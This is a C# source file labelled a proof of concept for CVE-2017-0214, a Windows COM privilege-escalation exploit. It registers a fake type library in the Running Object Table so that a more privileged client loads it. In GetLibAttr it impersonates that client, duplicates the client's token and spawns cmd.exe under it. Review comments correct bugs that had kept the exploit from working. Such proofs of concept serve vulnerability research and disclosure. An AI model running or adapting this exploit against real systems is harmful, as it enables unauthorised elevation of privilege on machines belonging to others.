using Microsoft.Win32.SafeHandles;
using MSSITLB;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Runtime.Versioning;
using System.Security;
using System.Security.Permissions;
using System.Security.Principal;
using System.Text;
using IS = System.Runtime.InteropServices;
namespace PoC_RotRegistrationEoP
{
static class Utils
{
    // Helper used by every wrapper method below to record which local
    // process is on the other end of the COM call currently being served.

    // Internal (I_-prefixed) rpcrt4 export. The original code passes a null
    // binding handle, i.e. it asks about the call being dispatched on the
    // current thread. A return value of 0 (RPC_S_OK) means ClientPID is valid.
    [IS.DllImport("rpcrt4.dll")]
    static extern int I_RpcBindingInqLocalClientPID(IntPtr ClientBinding, out int ClientPID);

    /// <summary>
    /// Returns the process id of the local RPC/COM client whose call is being
    /// dispatched on this thread.
    /// </summary>
    /// <returns>The client PID on success, otherwise -1 (for instance when the
    /// thread is not inside an RPC call).</returns>
    public static int GetRpcPid()
    {
        int clientPid;
        int status = I_RpcBindingInqLocalClientPID(IntPtr.Zero, out clientPid);
        return status == 0 ? clientPid : -1;
    }
}
[IS.ComVisible(true)]
class TypeInfoWrapper : ITypeInfo2, ITypeInfo
{
    // Pass-through ITypeInfo/ITypeInfo2 implementation. Every member forwards
    // to the wrapped type info after writing one trace line ("<client pid> -
    // <member>"), and any ITypeInfo / ITypeLib handed back to the caller is
    // itself wrapped so that nested objects are traced the same way.
    private ITypeInfo2 _inner;

    public TypeInfoWrapper(ITypeInfo2 type_info)
    {
        _inner = type_info;
    }

    // Accepts a plain ITypeInfo; the object must also implement ITypeInfo2,
    // otherwise the cast throws InvalidCastException.
    public TypeInfoWrapper(ITypeInfo type_info)
        : this((ITypeInfo2)type_info)
    {
    }

    // Emits the trace line shared by all members. The caller passes its own
    // MethodBase so the printed name is that of the forwarded member.
    private static void Trace(MethodBase caller)
    {
        Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), caller.Name);
    }

    // ---------------------------------------------------------------
    // Members that forward unchanged.
    // ---------------------------------------------------------------

    public void AddressOfMember(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out IntPtr ppv)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.AddressOfMember(memid, invKind, out ppv);
    }

    public void CreateInstance(object pUnkOuter, ref Guid riid, out object ppvObj)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.CreateInstance(pUnkOuter, ref riid, out ppvObj);
    }

    public void GetAllCustData(IntPtr pCustData)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetAllCustData(pCustData);
    }

    public void GetAllFuncCustData(int index, IntPtr pCustData)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetAllFuncCustData(index, pCustData);
    }

    public void GetAllImplTypeCustData(int index, IntPtr pCustData)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetAllImplTypeCustData(index, pCustData);
    }

    public void GetAllParamCustData(int indexFunc, int indexParam, IntPtr pCustData)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetAllParamCustData(indexFunc, indexParam, pCustData);
    }

    public void GetAllVarCustData(int index, IntPtr pCustData)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetAllVarCustData(index, pCustData);
    }

    public void GetCustData(ref Guid guid, out object pVarVal)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetCustData(ref guid, out pVarVal);
    }

    public void GetDllEntry(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, IntPtr pBstrDllName, IntPtr pBstrName, IntPtr pwOrdinal)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetDllEntry(memid, invKind, pBstrDllName, pBstrName, pwOrdinal);
    }

    public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile);
    }

    public void GetDocumentation2(int memid, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetDocumentation2(memid, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll);
    }

    public void GetFuncCustData(int index, ref Guid guid, out object pVarVal)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetFuncCustData(index, ref guid, out pVarVal);
    }

    public void GetFuncDesc(int index, out IntPtr ppFuncDesc)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetFuncDesc(index, out ppFuncDesc);
    }

    public void GetFuncIndexOfMemId(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out int pFuncIndex)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetFuncIndexOfMemId(memid, invKind, out pFuncIndex);
    }

    public void GetIDsOfNames(string[] rgszNames, int cNames, int[] pMemId)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetIDsOfNames(rgszNames, cNames, pMemId);
    }

    public void GetImplTypeCustData(int index, ref Guid guid, out object pVarVal)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetImplTypeCustData(index, ref guid, out pVarVal);
    }

    public void GetImplTypeFlags(int index, out System.Runtime.InteropServices.ComTypes.IMPLTYPEFLAGS pImplTypeFlags)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetImplTypeFlags(index, out pImplTypeFlags);
    }

    public void GetMops(int memid, out string pBstrMops)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetMops(memid, out pBstrMops);
    }

    public void GetNames(int memid, string[] rgBstrNames, int cMaxNames, out int pcNames)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetNames(memid, rgBstrNames, cMaxNames, out pcNames);
    }

    public void GetParamCustData(int indexFunc, int indexParam, ref Guid guid, out object pVarVal)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetParamCustData(indexFunc, indexParam, ref guid, out pVarVal);
    }

    public void GetRefTypeOfImplType(int index, out int href)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetRefTypeOfImplType(index, out href);
    }

    public void GetTypeAttr(out IntPtr ppTypeAttr)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetTypeAttr(out ppTypeAttr);
    }

    public void GetTypeComp(out ITypeComp ppTComp)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetTypeComp(out ppTComp);
    }

    public void GetTypeFlags(out int pTypeFlags)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetTypeFlags(out pTypeFlags);
    }

    public void GetTypeKind(out System.Runtime.InteropServices.ComTypes.TYPEKIND pTypeKind)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetTypeKind(out pTypeKind);
    }

    public void GetVarCustData(int index, ref Guid guid, out object pVarVal)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetVarCustData(index, ref guid, out pVarVal);
    }

    public void GetVarDesc(int index, out IntPtr ppVarDesc)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetVarDesc(index, out ppVarDesc);
    }

    public void GetVarIndexOfMemId(int memid, out int pVarIndex)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.GetVarIndexOfMemId(memid, out pVarIndex);
    }

    public void Invoke(object pvInstance, int memid, short wFlags, ref System.Runtime.InteropServices.ComTypes.DISPPARAMS pDispParams, IntPtr pVarResult, IntPtr pExcepInfo, out int puArgErr)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.Invoke(pvInstance, memid, wFlags, ref pDispParams, pVarResult, pExcepInfo, out puArgErr);
    }

    public void ReleaseFuncDesc(IntPtr pFuncDesc)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.ReleaseFuncDesc(pFuncDesc);
    }

    public void ReleaseTypeAttr(IntPtr pTypeAttr)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.ReleaseTypeAttr(pTypeAttr);
    }

    public void ReleaseVarDesc(IntPtr pVarDesc)
    {
        Trace(MethodBase.GetCurrentMethod());
        _inner.ReleaseVarDesc(pVarDesc);
    }

    // ---------------------------------------------------------------
    // Members whose results are re-wrapped before being returned.
    // ---------------------------------------------------------------

    // The containing library is returned as a TypeLibWrapper so that calls
    // made on it by the client are traced as well.
    public void GetContainingTypeLib(out ITypeLib ppTLB, out int pIndex)
    {
        Trace(MethodBase.GetCurrentMethod());
        ITypeLib containing;
        _inner.GetContainingTypeLib(out containing, out pIndex);
        ppTLB = new TypeLibWrapper(containing);
    }

    // Referenced type infos are wrapped for the same reason.
    public void GetRefTypeInfo(int hRef, out ITypeInfo ppTI)
    {
        Trace(MethodBase.GetCurrentMethod());
        ITypeInfo referenced;
        _inner.GetRefTypeInfo(hRef, out referenced);
        ppTI = new TypeInfoWrapper(referenced);
    }
}
// Raw PROCESS_INFORMATION layout (hProcess, hThread, dwProcessId, dwThreadId).
// Not referenced by the code visible in this file: TypeLibWrapper declares and
// uses its own ProcessInformation struct for CreateProcessAsUser. Kept as is
// because it is a layout-sensitive interop type (field order matters).
[StructLayout(LayoutKind.Sequential)]
internal class PROCESS_INFORMATION
{
// The handles in PROCESS_INFORMATION are initialized in unmanaged functions.
// We can't use SafeHandle here because Interop doesn't support [out] SafeHandles in structures/classes yet.
public IntPtr hProcess = IntPtr.Zero;
public IntPtr hThread = IntPtr.Zero;
public int dwProcessId = 0;
public int dwThreadId = 0;
// Note this class makes no attempt to free the handles
// Use InitialSetHandle to copy to handles into SafeHandles
// NOTE(review): if this type is ever used, both handles must be closed with
// CloseHandle by whoever receives them, or they leak for the process lifetime.
}
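[IS.ComVisible(true)]
class TypeLibWrapper : ITypeLib2, ITypeLib
{
    // Pass-through ITypeLib/ITypeLib2 implementation that is registered in the
    // Running Object Table by Program.Main. Every member traces the calling
    // client's PID and forwards to the real type library; GetLibAttr is the
    // PoC payload and impersonates the COM client that called it.

    [DllImport("ole32.dll", ExactSpelling = true, PreserveSig = false)]
    [return: MarshalAs(UnmanagedType.Interface)]
    static extern object CoGetCallContext([In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);

    // IID of IServerSecurity; must match the [Guid] on the IServerSecurity
    // interface declared further down in this file.
    Guid gd = new Guid("{0000013E-0000-0000-C000-000000000046}");

    private ITypeLib2 _tlb;

    public TypeLibWrapper(ITypeLib2 tlb)
    {
        _tlb = tlb;
    }

    // The wrapped object must also implement ITypeLib2 or the cast throws.
    public TypeLibWrapper(ITypeLib tlb)
        : this((ITypeLib2)tlb)
    {
    }

    [IS.DllImport("oleaut32.dll", CharSet = IS.CharSet.Unicode, PreserveSig = false)]
    static extern ITypeLib LoadTypeLib(string strTypeLibName);

    /// <summary>
    /// Loads the type library at <paramref name="typelibname"/> and wraps it.
    /// </summary>
    /// <param name="typelibname">Path of the (fake) type library to serve.</param>
    /// <exception cref="COMException">LoadTypeLib failed (PreserveSig = false).</exception>
    /// <exception cref="InvalidCastException">The library does not implement ITypeLib2.</exception>
    public TypeLibWrapper(string typelibname)
    {
        // The original try { } catch { throw; } added nothing; exceptions propagate unchanged.
        _tlb = (ITypeLib2)LoadTypeLib(typelibname);
    }

    // Trace line shared by all members: "<client pid> - <member name>".
    private static void Trace(MethodBase caller)
    {
        Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), caller.Name);
    }

    public void FindName(string szNameBuf, int lHashVal, ITypeInfo[] ppTInfo, int[] rgMemId, ref short pcFound)
    {
        Trace(MethodBase.GetCurrentMethod());
        _tlb.FindName(szNameBuf, lHashVal, ppTInfo, rgMemId, ref pcFound);
    }

    public void GetAllCustData(IntPtr pCustData)
    {
        Trace(MethodBase.GetCurrentMethod());
        _tlb.GetAllCustData(pCustData);
    }

    public void GetCustData(ref Guid guid, out object pVarVal)
    {
        Trace(MethodBase.GetCurrentMethod());
        _tlb.GetCustData(ref guid, out pVarVal);
    }

    public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile)
    {
        Trace(MethodBase.GetCurrentMethod());
        _tlb.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile);
    }

    public void GetDocumentation2(int index, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll)
    {
        Trace(MethodBase.GetCurrentMethod());
        _tlb.GetDocumentation2(index, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll);
    }

    // ------------------------------------------------------------------
    // Win32 token / process interop used by the GetLibAttr payload.
    // ------------------------------------------------------------------

    internal const String ADVAPI32 = "advapi32.dll";
    internal const String KERNEL32 = "kernel32.dll";

    // Bound to OpenThreadToken: opens the token of the given thread (the
    // impersonation token once ImpersonateClient has been called).
    [DllImport(ADVAPI32, SetLastError = true, EntryPoint = "OpenThreadToken")]
    [ResourceExposure(ResourceScope.None)]
    internal static extern bool
    OpenCurrentThreadToken(
        [In] IntPtr ThreadHandle,
        [In] TokenAccessLevels DesiredAccess,
        [In] bool OpenAsSelf,
        [Out] out IntPtr TokenHandle);

    [DllImport(KERNEL32, SetLastError = true)]
    [ResourceExposure(ResourceScope.None)]
    internal static extern IntPtr
    GetCurrentThread();

    // Every token and process/thread handle opened below is released with this.
    [DllImport(KERNEL32, SetLastError = true)]
    [return: MarshalAs(UnmanagedType.Bool)]
    static extern bool CloseHandle(IntPtr hObject);

    internal enum SECURITY_IMPERSONATION_LEVEL
    {
        Anonymous = 0,
        Identification = 1,
        Impersonation = 2,
        Delegation = 3,
    }

    [Serializable]
    internal enum TokenTypeVal : int
    {
        TokenPrimary = 1,
        TokenImpersonation
    }

    [ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)]
    [DllImport(ADVAPI32, CharSet = CharSet.Auto, SetLastError = true)]
    [ResourceExposure(ResourceScope.None)]
    internal static extern
    bool DuplicateTokenEx(
        [In] IntPtr ExistingTokenHandle,
        [In] TokenAccessLevels DesiredAccess,
        [In] IntPtr TokenAttributes,
        [In] SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
        [In] TokenTypeVal TokenType,
        [In, Out] ref IntPtr DuplicateTokenHandle);

    [DllImport(ADVAPI32, CharSet = System.Runtime.InteropServices.CharSet.Auto, SetLastError = true, BestFitMapping = false)]
    [System.Security.SuppressUnmanagedCodeSecurityAttribute()]
    [ResourceExposure(ResourceScope.Machine)]
    public extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SecurityAttributes lpProcessAttributes,
        ref SecurityAttributes lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment,
        String lpCurrentDirectory, ref StartupInfo lpStartupInfo, out ProcessInformation lpProcessInformation);

    [StructLayout(LayoutKind.Sequential)]
    public struct StartupInfo
    {
        public int cb;
        public String lpReserved;
        public String lpDesktop;
        public String lpTitle;
        public uint dwX;
        public uint dwY;
        public uint dwXSize;
        public uint dwYSize;
        public uint dwXCountChars;
        public uint dwYCountChars;
        public uint dwFillAttribute;
        public uint dwFlags;
        public short wShowWindow;
        public short cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdError;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct ProcessInformation
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public uint dwProcessId;
        public uint dwThreadId;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct SecurityAttributes
    {
        public int Length;
        public IntPtr lpSecurityDescriptor;
        public bool bInheritHandle;
    }

    // HRESULT CoQueryClientBlanket(DWORD*, DWORD*, OLECHAR**, DWORD*, DWORD*,
    // RPC_AUTHZ_HANDLE*, DWORD*). The original declared the principal name as
    // an [out] StringBuilder marshalled as LPWStr, which is not a valid
    // combination; it is an [out] pointer to a string the caller must free.
    [DllImport("ole32.dll")]
    static extern int CoQueryClientBlanket(out uint pAuthnSvc, out uint pAuthzSvc, out IntPtr pServerPrincName,
        out uint pAuthnLevel, out uint pImpLevel, out IntPtr pPrivs, out uint pCapabilities);

    // Logs the security blanket COM reports for the current incoming call.
    // pServerPrincName is allocated by COM and, per the CoQueryClientBlanket
    // contract, freed by the caller with CoTaskMemFree. pPrivs is not
    // dereferenced: its meaning depends on the authentication service.
    private static void LogClientBlanket()
    {
        uint authnSvc, authzSvc, authnLevel, impLevel, capabilities;
        IntPtr principal, privs;
        int hr = CoQueryClientBlanket(out authnSvc, out authzSvc, out principal, out authnLevel, out impLevel, out privs, out capabilities);
        if (hr != 0)
        {
            Console.WriteLine("CoQueryClientBlanket failed: 0x{0:X8}", hr);
            return;
        }
        try
        {
            string name = principal == IntPtr.Zero ? "<none>" : Marshal.PtrToStringUni(principal);
            Console.WriteLine("client blanket: authn={0} authz={1} authnLevel={2} impLevel={3} principal={4}",
                authnSvc, authzSvc, authnLevel, impLevel, name);
        }
        finally
        {
            if (principal != IntPtr.Zero)
            {
                Marshal.FreeCoTaskMem(principal);
            }
        }
    }

    // Prints whether the calling thread currently carries a token. Before
    // ImpersonateClient this typically fails (a thread has no token of its
    // own until it impersonates); afterwards it should succeed.
    private static void LogThreadToken(string label)
    {
        IntPtr token;
        if (OpenCurrentThreadToken(GetCurrentThread(), TokenAccessLevels.Query, true, out token))
        {
            Console.WriteLine("thread token {0}: {1}", label, token);
            CloseHandle(token);
        }
        else
        {
            Console.WriteLine("thread token {0}: none (err {1})", label, Marshal.GetLastWin32Error());
        }
    }

    // Duplicates the impersonation token currently on this thread into a
    // primary token and tries to start cmd.exe with it. Must be called while
    // the thread impersonates the COM client. All handles opened here are
    // closed before returning, whatever the outcome.
    private static void SpawnShellAsClient()
    {
        IntPtr impersonationToken = IntPtr.Zero;
        IntPtr primaryToken = IntPtr.Zero;
        var pi = new ProcessInformation();
        try
        {
            // DuplicateTokenEx checks TOKEN_DUPLICATE on the source handle.
            // The original opened the token with TOKEN_QUERY only, so the
            // duplicate could never succeed.
            if (!OpenCurrentThreadToken(GetCurrentThread(), TokenAccessLevels.Query | TokenAccessLevels.Duplicate, true, out impersonationToken))
            {
                Console.WriteLine("OpenThreadToken failed, err:" + Marshal.GetLastWin32Error());
                return;
            }
            Console.WriteLine("impersonation token:" + impersonationToken);

            // CreateProcessAsUser needs a primary token. The original asked
            // for an Identification-level duplicate, which is the weakest
            // level and is not meant for acting on the client's behalf.
            if (!DuplicateTokenEx(impersonationToken, TokenAccessLevels.MaximumAllowed, IntPtr.Zero,
                                  SECURITY_IMPERSONATION_LEVEL.Impersonation, TokenTypeVal.TokenPrimary, ref primaryToken))
            {
                Console.WriteLine("DuplicateTokenEx failed, err:" + Marshal.GetLastWin32Error());
                return;
            }
            // The original printed the source handle here, not the duplicate.
            Console.WriteLine("DuplicateTokenEx:" + primaryToken);

            var sa = new SecurityAttributes { lpSecurityDescriptor = IntPtr.Zero, bInheritHandle = false };
            sa.Length = Marshal.SizeOf(sa);
            var si = new StartupInfo();
            si.cb = Marshal.SizeOf(si);
            si.lpDesktop = "";

            // lpApplicationName is not path-searched by CreateProcess*, so the
            // bare "cmd.exe" the original passed there would only resolve if
            // it sat in the current directory. Let the command line carry the
            // full path instead, which is what the original intended.
            bool started = CreateProcessAsUser(primaryToken, null, @"C:\Windows\System32\cmd.exe", ref sa, ref sa, false, 0, IntPtr.Zero, "C:\\", ref si, out pi);
            Console.WriteLine("CreateProcessAsUser:" + started + (started ? "" : " err:" + Marshal.GetLastWin32Error()));
            // NOTE(review): by the documented CreateProcessAsUser contract the
            // calling process also needs SeAssignPrimaryTokenPrivilege unless
            // the token is a restricted copy of its own, so a failure here from
            // an unprivileged host is expected rather than a marshalling bug.
        }
        finally
        {
            if (pi.hThread != IntPtr.Zero) CloseHandle(pi.hThread);
            if (pi.hProcess != IntPtr.Zero) CloseHandle(pi.hProcess);
            if (primaryToken != IntPtr.Zero) CloseHandle(primaryToken);
            if (impersonationToken != IntPtr.Zero) CloseHandle(impersonationToken);
        }
    }

    /// <summary>
    /// PoC payload. Logs the caller, impersonates the COM client that invoked
    /// this method, attempts to start a shell with the client's token, reverts
    /// the impersonation and finally serves the real GetLibAttr so the caller
    /// still gets a valid answer.
    /// </summary>
    /// <param name="ppTLibAttr">Forwarded to the wrapped type library.</param>
    public void GetLibAttr(out IntPtr ppTLibAttr)
    {
        // Kept from the original PoC ("firstShoot"): a shell in this
        // process's own context, launched before any impersonation.
        using (Process.Start(@"C:\Windows\System32\cmd.exe"))
        {
        }
        Trace(MethodBase.GetCurrentMethod());
        Console.WriteLine("firstShoot");

        LogClientBlanket();
        LogThreadToken("before impersonation");

        IServerSecurity pss = null;
        try
        {
            pss = CoGetCallContext(gd) as IServerSecurity;
        }
        catch (COMException ex)
        {
            // Not inside a COM call (e.g. a direct in-process caller): there is
            // no client to impersonate, but the type library must still work.
            Console.WriteLine("CoGetCallContext failed: 0x{0:X8}", ex.ErrorCode);
        }

        if (pss != null)
        {
            // ImpersonateClient is [PreserveSig]; the original ignored its HRESULT.
            int hr = pss.ImpersonateClient();
            if (hr != 0)
            {
                Console.WriteLine("ImpersonateClient failed: 0x{0:X8}", hr);
            }
            else
            {
                try
                {
                    LogThreadToken("after impersonation");
                    SpawnShellAsClient();
                }
                finally
                {
                    // The original never reverted, leaving the thread running
                    // as the client for the rest of the call and beyond.
                    pss.RevertToSelf();
                }
            }
        }

        _tlb.GetLibAttr(out ppTLibAttr);
    }

    public void GetLibStatistics(IntPtr pcUniqueNames, out int pcchUniqueNames)
    {
        Trace(MethodBase.GetCurrentMethod());
        _tlb.GetLibStatistics(pcUniqueNames, out pcchUniqueNames);
    }

    public void GetTypeComp(out ITypeComp ppTComp)
    {
        Trace(MethodBase.GetCurrentMethod());
        _tlb.GetTypeComp(out ppTComp);
    }

    // Type infos handed to the client are wrapped so their calls are traced too.
    public void GetTypeInfo(int index, out ITypeInfo ppTI)
    {
        Trace(MethodBase.GetCurrentMethod());
        ITypeInfo type_info;
        _tlb.GetTypeInfo(index, out type_info);
        ppTI = new TypeInfoWrapper(type_info);
    }

    public int GetTypeInfoCount()
    {
        Trace(MethodBase.GetCurrentMethod());
        return _tlb.GetTypeInfoCount();
    }

    public void GetTypeInfoOfGuid(ref Guid guid, out ITypeInfo ppTInfo)
    {
        Trace(MethodBase.GetCurrentMethod());
        ITypeInfo type_info;
        _tlb.GetTypeInfoOfGuid(ref guid, out type_info);
        ppTInfo = new TypeInfoWrapper(type_info);
    }

    public void GetTypeInfoType(int index, out System.Runtime.InteropServices.ComTypes.TYPEKIND pTKind)
    {
        Trace(MethodBase.GetCurrentMethod());
        _tlb.GetTypeInfoType(index, out pTKind);
    }

    public bool IsName(string szNameBuf, int lHashVal)
    {
        Trace(MethodBase.GetCurrentMethod());
        return _tlb.IsName(szNameBuf, lHashVal);
    }

    public void ReleaseTLibAttr(IntPtr pTLibAttr)
    {
        Trace(MethodBase.GetCurrentMethod());
        _tlb.ReleaseTLibAttr(pTLibAttr);
    }
}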
// Coclass stub for the CLSID that Program's "-x" mode activates with
// Activator.CreateInstance. The body is intentionally empty: [ComImport]
// tells the runtime to create the object through COM activation.
// NOTE(review): the CLSID is not registered by anything in this file - the
// target server is assumed to be installed on the test machine.
[ComImport]
[Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480")]
public class mytestcom
{
}
// Interface of the test COM server above. No [InterfaceType] is given, so the
// runtime's default (dual) applies; only referenced from commented-out code
// in Program.Main.
[ComImport]
[Guid("E80A6EC1-39FB-462A-A56C-411EE9FC1AEB")]
public interface Imytestcom
{
void mdtest();
}
// Hand-written import of COM's IServerSecurity (IID 0000013E-...-46), obtained
// in TypeLibWrapper.GetLibAttr via CoGetCallContext. Because this is an
// IUnknown-derived interface, member order must match the native vtable
// exactly; do not reorder or insert members.
[ComImport,
Guid("0000013E-0000-0000-C000-000000000046"),
InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
internal interface IServerSecurity
{
// Every parameter is a raw out-pointer (or null). Not [PreserveSig], so a
// failing HRESULT surfaces as a COMException.
void QueryBlanket
(
IntPtr authnSvc,
IntPtr authzSvc,
IntPtr serverPrincipalName,
IntPtr authnLevel,
IntPtr impLevel,
IntPtr clientPrincipalName,
IntPtr Capabilities
);
// Switches the calling thread to the client's security context. Returns an
// HRESULT; callers must check it and pair a success with RevertToSelf.
[PreserveSig]
int ImpersonateClient();
// Restores the thread's own context after ImpersonateClient. Returns an HRESULT.
[PreserveSig]
int RevertToSelf();
// True while the calling thread is impersonating a client.
[PreserveSig]
[return: MarshalAs(UnmanagedType.Bool)]
bool IsImpersonating();
}
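class Program
{
    // Entry point of the CVE-2017-0214 PoC. Two modes:
    //   <fake_typelib>  register a TypeLibWrapper in the Running Object Table
    //                   under a file moniker for the target type library, then
    //                   keep the target file locked and repeatedly launch the
    //                   trigger;
    //   -x              the trigger: activate the test COM class so that the
    //                   server loads the type library through the ROT entry.

    const String OLEAUT32 = "oleaut32.dll";

    // Not used by the current code path (the LoadRegTypeLib call is commented
    // out in the original); kept because it is part of the class's surface.
    [DllImport(OLEAUT32,
        ExactSpelling = true,
        CharSet = CharSet.Unicode,
        PreserveSig = true)]
    [ResourceExposure(ResourceScope.None)]
    internal static extern int LoadRegTypeLib(ref Guid rguid, ushort major, ushort minor, int lcid,
        [MarshalAs(UnmanagedType.Interface)] out object typeLib);

    const int RPC_C_AUTHN_LEVEL_DEFAULT = 0;
    const int RPC_C_IMP_LEVEL_IMPERSONATE = 3;
    const int EOAC_APPID = 8;

    // With EOAC_APPID, pSecDesc is interpreted as the AppID GUID whose
    // registered security settings this process should use.
    [IS.DllImport("ole32.dll")]
    static extern int CoInitializeSecurity(
        ref Guid pSecDesc,
        int cAuthSvc,
        IntPtr asAuthSvc,
        IntPtr pReserved1,
        int dwAuthnLevel,
        int dwImpLevel,
        IntPtr pAuthList,
        int dwCapabilities,
        IntPtr pReserved3
    );

    [return: IS.MarshalAs(IS.UnmanagedType.Interface)]
    [IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
    static extern IMoniker CreateFileMoniker(string lpszPathName);

    [return: IS.MarshalAs(IS.UnmanagedType.Interface)]
    [IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
    static extern IRunningObjectTable GetRunningObjectTable(int reserved);

    const int ROTFLAGS_ALLOWANYCLIENT = 2;
    const int ROTFLAGS_REGISTRATIONKEEPSALIVE = 1;

    static Guid tapi3guid = new Guid("{21D6D480-A88B-11D0-83DD-00AA003CCABD}");

    // Path the file moniker is created for: the type library the victim is
    // expected to load. Environment-specific; the original also carried a
    // commented-out variant pointing at %SystemRoot%\System32\tapi3.dll.
    const string TargetTypeLibPath = "C:\\project\\testalt\\Debug\\testalt.dll";

    // AppID whose registered security settings are applied via EOAC_APPID.
    static readonly Guid PocAppId = new Guid("{3E5F704C-C0ED-491C-9BB5-EA1EAD8B31B7}");

    // "-x" mode: activating this CLSID is what makes the target load the
    // type library and hit the ROT-registered TypeLibWrapper.
    static readonly Guid TriggerClsid = new Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480");

    [MTAThread]
    static void Main(string[] args)
    {
        try
        {
            if (args.Length < 1)
            {
                Console.WriteLine("Usage: fake_typelib|-x");
                return;
            }
            if (args[0] == "-x")
            {
                RunTrigger();
            }
            else
            {
                RunRotServer(args[0]);
            }
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex);
        }
        Console.ReadKey();
    }

    // Trigger side: activate the test COM class. Any failure propagates to
    // Main's catch block and is printed.
    private static void RunTrigger()
    {
        Type t = Type.GetTypeFromCLSID(TriggerClsid);
        Activator.CreateInstance(t);
    }

    // Server side. fakeTypeLibPath is the library actually served to clients;
    // the usage string names it as the first argument, but the original
    // ignored args[0] and used a hard-coded path here.
    private static void RunRotServer(string fakeTypeLibPath)
    {
        Guid appid = PocAppId;
        int hr = CoInitializeSecurity(ref appid, -1, IntPtr.Zero, IntPtr.Zero,
            RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero, EOAC_APPID, IntPtr.Zero);
        if (hr != 0)
        {
            IS.Marshal.ThrowExceptionForHR(hr);
        }

        TypeLibWrapper tlb = new TypeLibWrapper(fakeTypeLibPath);
        IMoniker moniker = CreateFileMoniker(TargetTypeLibPath);
        IRunningObjectTable rot = GetRunningObjectTable(0);
        int flags = ROTFLAGS_ALLOWANYCLIENT | ROTFLAGS_REGISTRATIONKEEPSALIVE;
        int cookie = rot.Register(flags, tlb, moniker);
        try
        {
            Console.ReadKey();
            // Keep the target file open and its first page locked while the
            // trigger runs, then launch this executable in "-x" mode once per
            // chunk read. The original loop body and key presses are preserved.
            using (FileStream stm = new FileStream(TargetTypeLibPath, FileMode.Open, FileAccess.Read, FileShare.Read | FileShare.Delete))
            {
                stm.Lock(0, 4096);
                Console.WriteLine("Waiting");
                byte[] chunk = new byte[4096];
                string self;
                using (Process current = Process.GetCurrentProcess())
                {
                    self = current.MainModule.FileName;
                }
                while (stm.Read(chunk, 0, chunk.Length) > 0)
                {
                    using (Process trigger = Process.Start(self, "-x"))
                    {
                        trigger.WaitForExit();
                    }
                    Console.ReadKey();
                    Console.WriteLine("Exited");
                }
                Console.ReadKey();
            }
        }
        finally
        {
            // The original only revoked on the success path, leaving a stale
            // ROT entry (with REGISTRATIONKEEPSALIVE) behind on any exception.
            rot.Revoke(cookie);
        }
    }
}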
}
CVE-2017-0214 PoC